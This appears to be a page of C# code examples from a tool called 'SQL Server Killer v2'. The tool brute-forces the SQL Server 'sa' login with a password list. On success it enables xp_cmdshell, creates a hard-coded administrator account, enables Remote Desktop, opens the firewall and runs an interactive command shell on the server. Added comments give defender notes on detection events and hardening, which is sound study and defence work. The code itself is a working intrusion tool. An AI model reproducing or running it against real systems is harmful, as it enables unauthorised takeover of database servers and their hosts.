Ejemplo n.º 1
        /// <summary>
        /// Makes one SQL Server login attempt as <c>sa</c> against a single host with a single
        /// candidate password, and hands a successful connection string to <c>observeResult</c>.
        /// </summary>
        /// <param name="ipAndPasswordObject">
        /// A <c>string[]</c> passed as <c>object</c>: element 0 is the host, element 1 the candidate
        /// password. The <c>object</c> signature suggests a thread entry point, presumably started
        /// by <c>startThreads</c> (not shown) - confirm against the caller.
        /// </param>
        /// <remarks>
        /// Defender view: this is SQL-authentication password guessing against the built-in
        /// <c>sa</c> login. Each wrong guess is a failed login on the server (SQL Server error 18456
        /// in the error log when failed-login auditing is on, which is the default setting), so a
        /// burst of such failures for <c>sa</c> from one source address is the signal to alert on.
        /// Disabling or renaming <c>sa</c>, using Windows authentication only, and not exposing
        /// the SQL Server port to untrusted networks remove the precondition for this routine.
        /// </remarks>
        public void tryConnect(object ipAndPasswordObject)
        {
            string[] hostAndSecret = (string[])ipAndPasswordObject;

            string host      = hostAndSecret[0];
            string candidate = hostAndSecret[1];

            // Plain text substitution into a fixed template: the login name is always "sa" and
            // neither value is escaped or validated before it becomes part of the connection string.
            string newConnString = "Data Source=[rxr];uid=sa;pwd=[pxp];"
                .Replace("[rxr]", host)
                .Replace("[pxp]", candidate);

            try
            {
                using (SqlConnection conn = new SqlConnection(newConnString))
                {
                    // The candidate password is written to the log in clear text.
                    GenericFunctions.logNotification("Trying with username : sa & password : " + candidate);
                    conn.Open();

                    // Reached only when Open() succeeded: the shared candidate list is emptied.
                    // NOTE(review): no lock is visible here although the list is shared with Main.
                    Program.passwords.RemoveRange(0, Program.passwords.Count);
                    observeResult(true, newConnString);
                }
            }
            catch (Exception)
            {
                // Deliberately empty in the original: a rejected login, a network failure and any
                // exception thrown inside observeResult are all discarded without a trace.
            }
        }
Ejemplo n.º 2
        /// <summary>
        /// Console entry point: asks for a host, checks it with <c>GenericFunctions.checkNode</c>,
        /// loads a password list from file and feeds it to <c>startThreads</c> in batches of up to five.
        /// </summary>
        /// <param name="args">Command-line arguments; not used.</param>
        /// <remarks>
        /// Defender view: the batching means a target sees login attempts arrive in small groups
        /// rather than one at a time. Because the guesses are aimed at a SQL login, Windows account
        /// lockout does not apply; lockout for SQL logins depends on password-policy enforcement
        /// being enabled for the login. Rate-based alerting on failed <c>sa</c> logins and network
        /// filtering in front of the database are the practical controls.
        /// <c>checkNode</c>, <c>getPasswordFromFile</c> and <c>startThreads</c> are not part of
        /// this listing, so their exact behaviour is not described here.
        /// </remarks>
        static void Main(string[] args)
        {
            Console.Title = "SQL Server Killer v2 by rummykhan";

            Console.Write("Enter Host IP : ");
            string ip = Console.ReadLine();

            Console.WriteLine("");

            // Unreachable host: report, wait for a key press and stop.
            if (!GenericFunctions.checkNode(ip))
            {
                GenericFunctions.logError("Host is Dead..!!");
                GenericFunctions.logNotification("Press any key to exit..");
                Console.ReadKey();
                return;
            }

            GenericFunctions.logNotification("Host is Live and running SQL Server..");

            passwords = GenericFunctions.getPasswordFromFile();

            // A null list ends the program silently, exactly as the original does.
            if (passwords == null)
            {
                return;
            }

            if (passwords.Count <= 0)
            {
                GenericFunctions.logError("Password File is probably empty..!!");
                return;
            }

            GenericFunctions.logNotification("Total passwords loaded are : " + passwords.Count);

            const int batchSize = 5;

            // The remaining count is tracked in a local while the list itself is shared.
            // NOTE(review): tryConnect empties the same list on success; how that interacts with
            // this loop depends on whether startThreads blocks - confirm against its definition.
            int remaining = passwords.Count;
            while (remaining > 0)
            {
                // Full batches of five, then whatever is left for the final batch.
                int take = Math.Min(batchSize, remaining);
                remaining -= take;

                List<string> batch = passwords.GetRange(0, take);
                passwords.RemoveRange(0, take);
                startThreads(ip, batch);
            }
        }
Ejemplo n.º 3
        /// <summary>
        /// Post-login routine. When <paramref name="result"/> is true it runs ten predefined
        /// commands from <c>Exploit.ExploitationCommands</c> (indexes 0 to 9) over the supplied
        /// connection string, then loops forwarding console input to <c>xp_cmdshell</c> until the
        /// operator enters "c". When <paramref name="result"/> is false the method does nothing.
        /// </summary>
        /// <param name="result">True when the preceding login attempt succeeded.</param>
        /// <param name="connString">Connection string, clear-text password included, used for every command.</param>
        /// <remarks>
        /// The command text is not part of this listing; what each step is meant to do is known
        /// here only from the log message printed before it.
        /// Defender view: taken together the messages describe a host takeover through the database
        /// engine - OS command execution from SQL Server, a new local account placed in an
        /// administrators group, and remote-access and firewall changes. Expected telemetry, where
        /// the corresponding auditing is enabled: a server configuration change recorded in the SQL
        /// Server error log (message 15457), Windows Security events 4720 (account created) and
        /// 4732 (member added to a local group), a firewall rule-change event, and child processes
        /// spawned by the SQL Server service process. The fixed account name in the log strings
        /// below is a usable indicator when reviewing a host. Running the SQL Server service under
        /// a low-privileged account limits what commands issued through xp_cmdshell can change.
        /// </remarks>
        public void observeResult(bool result, string connString)
        {
            if (result)
            {
                // The full connection string, password included, is written to the log.
                GenericFunctions.logSuccess("Finalized Connection String is : " + connString);

                Exploit exploit = new Exploit();

                GenericFunctions.logNotification("Starting Exploitation.. Devil Mode ON");

                // Steps 0 and 1 go through executeCommand/dbResponse; steps 2 to 9 go through
                // executeCommandWithOutput/logDataTable. The steps run strictly in this order and
                // no return value is checked before the next step starts.
                GenericFunctions.logNotification("Enabling XP_CMD Shell..");

                GenericFunctions.dbResponse(exploit.executeCommand(connString, Exploit.ExploitationCommands[0]));

                GenericFunctions.logNotification("Enabling Automation Procedure..");

                GenericFunctions.dbResponse(exploit.executeCommand(connString, Exploit.ExploitationCommands[1]));

                // Account name and password are hard-coded in the message; presumably the command
                // at index 2 uses the same values - not visible here.
                GenericFunctions.logNotification("Adding user Ch3rn0by1 with password lafangoo..");

                GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, Exploit.ExploitationCommands[2]));

                GenericFunctions.logNotification("Adding user Ch3rn0by1 to Admin Group..");

                GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, Exploit.ExploitationCommands[3]));

                GenericFunctions.logNotification("Enabling Remote Desktop -- Method # 1..");

                GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, Exploit.ExploitationCommands[4]));

                GenericFunctions.logNotification("Enabling Remote Desktop -- Method # 2..");

                GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, Exploit.ExploitationCommands[5]));

                GenericFunctions.logNotification("Adding Remote Desktop Port in Firewall -- Method # 1..");

                GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, Exploit.ExploitationCommands[6]));

                GenericFunctions.logNotification("Adding Remote Desktop Port in Firewall -- Advance Method..");

                GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, Exploit.ExploitationCommands[7]));

                GenericFunctions.logNotification("Configuring Remote Service/Service Manager..");

                GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, Exploit.ExploitationCommands[8]));

                GenericFunctions.logNotification("Restarting Service Manager..");

                GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, Exploit.ExploitationCommands[9]));

                // Interactive phase: every line except "c" is lower-cased, concatenated unescaped
                // into an xp_cmdshell statement and executed over the same connection string.
                string choice = "x";
                while (choice != "c")
                {
                    Console.ForegroundColor = ConsoleColor.White;
                    Console.Write("Enter CMD Command to Execute on Server\nOR Press c to exit : ");
                    // ReadLine() returns null at end of input, in which case ToLower() throws.
                    choice = Console.ReadLine().ToLower();
                    if (choice != "c")
                    {
                        choice = "EXEC master..xp_cmdshell'" + choice + "'";
                        GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, choice));
                    }
                }
                GenericFunctions.logNotification("Press any key to exit..");
                Console.ReadKey();
            }
        }